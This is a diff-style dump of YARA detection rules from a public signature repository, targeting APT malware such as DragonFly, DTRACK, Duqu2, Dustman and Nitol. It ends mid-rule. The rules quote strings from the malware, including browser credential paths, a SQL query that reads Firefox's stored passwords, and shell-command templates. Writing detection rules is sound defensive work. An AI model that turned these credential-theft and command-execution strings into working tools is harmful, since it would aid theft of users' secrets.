$s2 = "%02d.%02d.%04d %02d:%02d" fullword wide
$s3 = "*pass*.*" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 100KB and all of them )
}
rule DragonFly_APT_Sep17_2 {
meta:
description = "Detects malware from DrqgonFly APT report"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
date = "2017-09-12"
modified = "2023-01-06"
hash1 = "178348c14324bc0a3e57559a01a6ae6aa0cb4013aabbe324b51f906dcf5d537e"
id = "e64f121d-a628-54b5-88f3-96eea388c155"
strings:
$s1 = "\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" wide
$s2 = "C:\\Users\\Public\\Log.txt" fullword wide
$s3 = "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins" fullword wide
$s4 = "***************** Mozilla Firefox ****************" fullword wide
$s5 = "********************** Opera *********************" fullword wide
$s6 = "\\AppData\\Local\\Microsoft\\Credentials\\" wide
$s7 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\" wide
$s8 = "**************** Internet Explorer ***************" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 3000KB and 3 of them )
}
rule DragonFly_APT_Sep17_3 {
meta:
description = "Detects malware from DrqgonFly APT report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
date = "2017-09-12"
hash1 = "b051a5997267a5d7fa8316005124f3506574807ab2b25b037086e2e971564291"
id = "4eafd732-80bc-5f50-bf0d-096df4d35d61"
strings:
$s1 = "kernel64.dll" fullword ascii
$s2 = "ws2_32.dQH" fullword ascii
$s3 = "HGFEDCBADCBA" fullword ascii
$s4 = "AWAVAUATWVSU" fullword ascii
condition:
( uint16(0) == 0x5a4d and
filesize < 40KB and (
pe.imphash() == "6f03fb864ff388bac8680ac5303584be" or
all of them
)
)
}
rule DragonFly_APT_Sep17_4 {
meta:
description = "Detects malware from DrqgonFly APT report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
date = "2017-09-12"
hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
id = "dbc0eebf-fc81-5a0b-b2e0-129d0b40b6f7"
strings:
$s1 = "screen.exe" fullword wide
$s2 = "PlatformInvokeUSER32" fullword ascii
$s3 = "GetDesktopImageF" fullword ascii
$s4 = "PlatformInvokeGDI32" fullword ascii
$s5 = "GetDesktopImage" fullword ascii
$s6 = "Too many arguments, going to store in current dir" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 60KB and all of them )
}

View file

@ -0,0 +1,44 @@
rule APT_MAL_DTRACK_Oct19_1 {
meta:
description = "Detects DTRACK malware"
author = "Florian Roth (Nextron Systems)"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
reference = "https://twitter.com/a_tweeter_user/status/1188811977851887616?s=21"
date = "2019-10-28"
hash1 = "c5c1ca4382f397481174914b1931e851a9c61f029e6b3eb8a65c9e92ddf7aa4c"
hash2 = "a0664ac662802905329ec6ab3b3ae843f191e6555b707f305f8f5a0599ca3f68"
hash3 = "93a01fbbdd63943c151679d037d32b1d82a55d66c6cb93c40ff63f2b770e5ca9"
hash4 = "3cc9d9a12f3b884582e5c4daf7d83c4a510172a836de90b87439388e3cde3682"
hash5 = "bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364"
hash6 = "58fef66f346fe3ed320e22640ab997055e54c8704fc272392d71e367e2d1c2bb"
hash7 = "9d9571b93218f9a635cfeb67b3b31e211be062fd0593c0756eb06a1f58e187fd"
id = "802135bd-234d-574d-b111-fcc9eaa000f8"
strings:
$xc1 = { 25 73 2A 2E 2A 00 00 00 5C 00 00 00 25 73 7E 00
5C 00 00 00 77 62 00 00 64 61 74 00 64 6B 77 65
72 6F 33 38 6F 65 72 41 5E 74 40 23 00 00 00 00
63 3A 5C 00 25 73 5C 25 63 2E 74 6D 70 }
$sx1 = "%02d.%02d.%04d - %02d:%02d:%02d:%03d : " fullword ascii
$sx2 = "%s\\%c.tmp" fullword ascii
$sx3 = "dkwero38oerA" fullword ascii
$sx4 = "awz2qr21yfbj" fullword ascii
$s1 = "Execute_%s.log" ascii
$s2 = "%s\\%s\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" fullword ascii
$s3 = "CCS_Mozilla/5.0" fullword ascii
$s4 = "\\C$\\Windows\\Temp\\MpLogs\\" ascii
$s5 = "127.0.0.1 >NUL & echo EEEE > \"%s\"" fullword ascii
$s6 = "[+] DownloadCommand" fullword ascii
$s7 = "DC-Error: Too long cmd length" fullword ascii
$s8 = "%s\\~%d.tmp" fullword ascii
$s9 = "%02X:%02X:%02X:%02X:%02X:%02X" ascii fullword
$op1 = { 0f b6 8d a3 fc ff ff 85 c9 74 09 8b 55 f4 83 c2 }
$op2 = { 6a 00 8d 85 28 fc ff ff 50 6a 04 8d 4d f8 51 8b }
$op3 = { 8b 85 c8 fd ff ff 03 85 a4 fc ff ff 89 85 b4 fc }
condition:
$xc1 or 2 of ($sx*) or 4 of them or
( uint16(0) == 0x5a4d and filesize <= 3000KB and 2 of them )
}

View file

@ -0,0 +1,152 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-06-10
Identifier: Dubnium
*/
/* Rule Set ----------------------------------------------------------------- */
rule Dubnium_Sample_1 {
meta:
description = "Detects sample mentioned in the Dubnium Report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/AW9Cuu"
date = "2016-06-10"
hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
id = "377ecbaa-9324-562e-a973-0276d44f3feb"
strings:
$key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii
$key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and all of them
}
rule Dubnium_Sample_2 {
meta:
description = "Detects sample mentioned in the Dubnium Report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/AW9Cuu"
date = "2016-06-10"
hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
id = "894dc893-25fc-5fdc-9f69-8085b94e1af1"
strings:
$x1 = ":*:::D:\\:c:~:" fullword ascii
$s2 = "SPMUVR" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 2000KB and all of them )
}
rule Dubnium_Sample_3 {
meta:
description = "Detects sample mentioned in the Dubnium Report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/AW9Cuu"
date = "2016-06-10"
hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8"
hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5"
hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827"
id = "66f66139-88df-5ba9-a3fc-ba4fc98ce3f9"
strings:
$x1 = "copy /y \"%s\" \"%s\" " fullword ascii
$x2 = "del /f \"%s\" " fullword ascii
$s1 = "del /f /ah \"%s\" " fullword ascii
$s2 = "if exist \"%s\" goto Rept " fullword ascii
$s3 = "\\*.*.lnk" ascii
$s4 = "Dropped" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and 5 of them
}
rule Dubnium_Sample_5 {
meta:
description = "Detects sample mentioned in the Dubnium Report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/AW9Cuu"
date = "2016-06-10"
super_rule = 1
hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
id = "09c1aeee-9437-54e9-967f-3c2fcc0736ed"
strings:
$s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii
$s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 9000KB and all of them
}
rule Dubnium_Sample_6 {
meta:
description = "Detects sample mentioned in the Dubnium Report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/AW9Cuu"
date = "2016-06-10"
super_rule = 1
hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
id = "43366f1a-784d-515e-a8e9-3e924f2abfd8"
strings:
$s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii
$s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii
$s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 4000KB and all of them
}
rule Dubnium_Sample_7 {
meta:
description = "Detects sample mentioned in the Dubnium Report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/AW9Cuu"
date = "2016-06-10"
super_rule = 1
hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
id = "6712bd5f-6bbc-5ca0-9fc7-b2013b8f8147"
strings:
$s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii
$s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 9000KB and all of them
}
rule Dubnium_Sample_SSHOpenSSL {
meta:
description = "Detects sample mentioned in the Dubnium Report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/AW9Cuu"
date = "2016-06-10"
hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
hash4 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
id = "d4f2b494-47b6-5b8e-b358-30159dfb977b"
strings:
$s1 = "sshkeypairgen.exe" fullword wide
$s2 = "OpenSSL: FATAL" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 9000KB and all of them
}

View file

@ -0,0 +1,17 @@
rule Duqu1_5_modules {
meta:
author = "Silas Cutler (havex@chronicle.security)"
desc = "Detection for Duqu 1.5 modules"
hash = "bb3961e2b473c22c3d5939adeb86819eb846ccd07f5736abb5e897918580aace"
reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
id = "7239f5e1-c08f-566c-8998-f7dacc2c4a29"
strings:
$c1 = "%s(%d)disk(%d)fdisk(%d)"
$c2 = "\\Device\\Floppy%d" wide
$c3 = "BrokenAudio" wide
$m1 = { 81 3F E9 18 4B 7E}
$m2 = { 81 BC 18 F8 04 00 00 B3 20 EA B4 }
condition:
all of them
}

104
yara-Neo23x0/apt_duqu2.yar Normal file
View file

@ -0,0 +1,104 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-07-02
Identifier: Duqu2
*/
/* Rule Set ----------------------------------------------------------------- */
rule Duqu2_Sample1 {
meta:
description = "Detects malware - Duqu2 (cross-matches with IronTiger malware and Derusbi)"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
date = "2016-07-02"
score = 80
hash1 = "6b146e3a59025d7085127b552494e8aaf76450a19c249bfed0b4c09f328e564f"
hash2 = "8e97c371633d285cd8fc842f4582705052a9409149ee67d97de545030787a192"
hash3 = "2796a119171328e91648a73d95eb297edc220e8768f4bbba5fb7237122a988fc"
hash4 = "5559fcc93eef38a1c22db66a3e0f9e9f026c99e741cc8b1a4980d166f2696188"
id = "39ba04f1-df45-5513-ab8f-12097a79cdc7"
strings:
$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
$s2 = "MSI.dll" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 40KB and $x1 ) or ( all of them )
}
rule Duqu2_Sample2 {
meta:
description = "Detects Duqu2 Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
date = "2016-07-02"
score = 80
hash1 = "d12cd9490fd75e192ea053a05e869ed2f3f9748bf1563e6e496e7153fb4e6c98"
hash2 = "5ba187106567e8d036edd5ddb6763f89774c158d2a571e15d76572d8604c22a0"
hash3 = "6e09e1a4f56ea736ff21ad5e188845615b57e1a5168f4bdaebe7ddc634912de9"
hash4 = "c16410c49dc40a371be22773f420b7dd3cfd4d8205cf39909ad9a6f26f55718e"
hash5 = "2ecb26021d21fcef3d8bba63de0c888499110a2b78e4caa6fa07a2b27d87f71b"
hash6 = "2c9c3ddd4d93e687eb095444cef7668b21636b364bff55de953bdd1df40071da"
id = "a32f54a3-8656-5592-ac40-17330bfca319"
strings:
$s1 = "=<=Q=W=a=g=p=v=|=" fullword ascii
$s2 = ">#>(>.>3>=>]>d>p>" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 50KB and all of ($s*)
}
rule Duqu2_Sample3 {
meta:
description = "Detects Duqu2 Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
date = "2016-07-02"
score = 80
hash1 = "2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69"
id = "c558445f-fbe3-57db-80f7-09a87b097921"
strings:
$s1 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 50KB and $s1 )
}
rule Duqu2_Sample4 {
meta:
description = "Detects Duqu2 Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
date = "2016-07-02"
score = 80
hash1 = "3536df7379660d931256b3cf49be810c0d931c3957c464d75e4cba78ba3b92e3"
id = "8c5ca68d-762c-5d2e-8d37-f58dc66bcae2"
strings:
$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
$s2 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
$s3 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
$s4 = "ProcessUserAccounts" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 30KB and 1 of ($x*) ) or ( all of them )
}
rule Duqu2_UAs {
meta:
description = "Detects Duqu2 Executable based on the specific UAs in the file"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
date = "2016-07-02"
score = 80
hash1 = "52fe506928b0262f10de31e783af8540b6a0b232b15749d647847488acd0e17a"
hash2 = "81cdbe905392155a1ba8b687a02e65d611b60aac938e470a76ef518e8cffd74d"
id = "d82f6351-fab0-5324-850f-dd40a172fceb"
strings:
$x1 = "Mozilla/5.0 (Windows NT 6.1; U; ru; rv:5.0.1.6) Gecko/20110501 Firefox/5.0.1 Firefox/5.0.1" fullword wide
$x2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7xs5D9rRDFpg2g" fullword wide
$x3 = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322)" fullword wide
$x4 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 800KB and all of them )
}

View file

@ -0,0 +1,50 @@
rule MAL_ME_RawDisk_Agent_Jan20_1 {
meta:
description = "Detects suspicious malware using ElRawDisk"
author = "Florian Roth (Nextron Systems)"
reference = "Saudi National Cybersecurity Authority - Destructive Attack DUSTMAN"
date = "2020-01-02"
modified = "2022-12-21"
hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
id = "0efaae51-1407-5039-9e5a-9c2f13d6a971"
strings:
$x1 = "\\drv\\agent.plain.pdb" ascii
$x2 = " ************** Down With Saudi Kingdom, Down With Bin Salman ************** " fullword ascii
$s1 = ".?AVERDError@@" fullword ascii
$s2 = "b4b615c28ccd059cf8ed1abf1c71fe03c0354522990af63adf3c911e2287a4b906d47d" fullword wide
$s3 = "\\\\?\\ElRawDisk" fullword wide
$s4 = "\\??\\c:" wide
$op1 = { e9 3d ff ff ff 33 c0 48 89 05 0d ff 00 00 48 8b }
$op2 = { 0f b6 0c 01 88 48 34 48 8b 8d a8 }
condition:
uint16(0) == 0x5a4d and filesize <= 2000KB and ( 1 of ($x*) or 4 of them )
}
rule MAL_ME_RawDisk_Agent_Jan20_2 {
meta:
description = "Detects suspicious malware using ElRawDisk"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/jfslowik/status/1212501454549741568?s=09"
date = "2020-01-02"
modified = "2022-12-21"
hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
id = "9817fb22-7bed-5869-aa92-66c458b81c7f"
strings:
$x1 = "\\Release\\Dustman.pdb" ascii
$x2 = "/c agent.exe A" fullword ascii
$s1 = "C:\\windows\\system32\\cmd.exe" fullword ascii
$s2 = "The Magic Word!" fullword ascii
$s3 = "Software\\Oracle\\VirtualBox" fullword wide
$s4 = "\\assistant.sys" wide
$s5 = "Down With Bin Salman" fullword wide
$sc1 = { 00 5C 00 5C 00 2E 00 5C 00 25 00 73 }
$op1 = { 49 81 c6 ff ff ff 7f 4c 89 b4 24 98 }
condition:
uint16(0) == 0x5a4d and filesize <= 3000KB and ( 1 of ($x*) or 3 of them )
}

View file

@ -0,0 +1,43 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-01-02
Identifier: Emissary Malware
*/
rule Emissary_APT_Malware_1 {
meta:
description = "Detects Emissary Malware - from samples A08E81B411.DAT, ishelp.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/V0epcf"
date = "2016-01-02"
score = 75
hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab"
hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629"
hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290"
hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664"
hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc"
hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b"
hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8"
hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9"
hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d"
hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538"
hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051"
hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0"
hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb"
id = "ae6ff471-9255-52a3-89d2-452eb2556184"
strings:
$s1 = "cmd.exe /c %s > %s" fullword ascii
$s2 = "execute cmd timeout." fullword ascii
$s3 = "rundll32.exe \"%s\",Setting" fullword ascii
$s4 = "DownloadFile - exception:%s." fullword ascii
$s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii
$s6 = "UploadFile - EncryptBuffer Error" fullword ascii
$s7 = "WinDLL.dll" fullword wide
$s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii
$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii
$s10 = "CDllApp::InitInstance() - Evnet already exists." fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 250KB and 3 of them
}

1948
yara-Neo23x0/apt_eqgrp.yar Normal file

File diff suppressed because it is too large Load diff

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,66 @@
rule SUSP_ELF_SPARC_Hunting_SBZ_Obfuscation {
meta:
description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
author = "netadr, modified by Florian Roth to avoid elf module import"
reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
date = "2023-04-02"
modified = "2023-05-08"
score = 60
id = "15ee9a66-d823-508c-a14c-2c6ff45f47e5"
strings:
// xor g3, 0x47, o5
// xor o5, g1, o5
// xor g2, o5, o5
$xor_block = { 9A 18 E0 47 9A 1B 40 01 9A 18 80 0D }
$a1 = "SUNW_"
condition:
uint32be(0) == 0x7f454c46
and $a1
and $xor_block
}
rule SUSP_ELF_SPARC_Hunting_SBZ_UniqueStrings {
meta:
description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
author = "netadr, modified by Florian Roth for performance reasons"
reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
date = "2023-04-02"
modified = "2023-05-08"
score = 60
id = "d2f70d10-412e-5e83-ba4f-eac251012dc1"
strings:
$s1 = "<%u>[%s] Event #%u: "
/* $s2 = "ofn" */
$s2 = "lprc:%08X" ascii fullword
// suggested by https://twitter.com/adulau/status/1553401532514766848
$s3 = "diuXxobB"
$s4 = "CHM_FW"
condition:
2 of ($*)
}
rule SUSP_ELF_SPARC_Hunting_SBZ_ModuleStruct {
meta:
description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
author = "netadr, modified by Florian Roth for FP reduction reasons"
reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
date = "2023-04-02"
modified = "2023-05-08"
score = 60
id = "909746f1-44f5-597b-bdb2-2a1396d4b8c7"
strings:
$be = { 02 02 00 00 01 C1 00 07 }
$le = { 02 02 00 00 07 00 C1 01 }
condition:
uint32be(0) == 0x7f454c46 and ( $be or $le )
}

View file

@ -0,0 +1,18 @@
rule APT_Equation_Group_Op_Triangulation_TriangleDB_Implant_Jun23_1 {
meta:
description = "Detects TriangleDB implant found being used in Operation Triangulation on iOS devices (maybe also used on macOS systems)"
author = "Florian Roth"
reference = "https://securelist.com/triangledb-triangulation-implant/110050/"
date = "2023-06-21"
score = 80
id = "d81a5103-41c8-5dba-a560-8fb5514f6c0a"
strings:
$s1 = "unmungeHexString" ascii fullword
$s2 = "CRPwrInfo" ascii fullword
$s3 = "CRConfig" ascii fullword
$s4 = "CRXConfigureDBServer" ascii fullword
condition:
( uint16(0) == 0xfacf and filesize < 30MB and $s1 and 2 of them )
or all of them
}

View file

@ -0,0 +1,61 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-06-04
Identifier: FireEye EternalBlue - Non-Wannacry Attacks
Reference: https://goo.gl/OOB3mH
*/
/* Rule Set ----------------------------------------------------------------- */
rule Backdoor_Redosdru_Jun17 : HIGHVOL {
meta:
description = "Detects malware Redosdru - file systemHome.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/OOB3mH"
date = "2017-06-04"
hash1 = "4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309"
id = "ea038142-6903-5d08-ac89-70c1bbef716c"
strings:
$x1 = "%s\\%d.gho" fullword ascii
$x2 = "%s\\nt%s.dll" fullword ascii
$x3 = "baijinUPdate" fullword ascii
$s1 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
$s2 = "serviceone" fullword ascii
$s3 = "\x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#f \x1f#" fullword ascii
$s4 = "servicetwo" fullword ascii
$s5 = "UpdateCrc" fullword ascii
$s6 = "\x1f#[ \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#" fullword ascii
$s7 = "nwsaPAgEnT" fullword ascii
$s8 = "%-24s %-15s 0x%x(%d) " fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 700KB and 1 of ($x*) or 4 of them )
}
rule Backdoor_Nitol_Jun17 {
meta:
description = "Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/OOB3mH"
date = "2017-06-04"
modified = "2023-01-07"
hash1 = "cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946"
id = "7dd26868-59e0-51a1-b12a-3b69d6246ff5"
strings:
$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
$x3 = "TCPConnectFloodThread.target = %s" fullword ascii
$s1 = "\\Program Files\\Internet Explorer\\iexplore.exe" ascii
$s2 = "%c%c%c%c%c%c.exe" fullword ascii
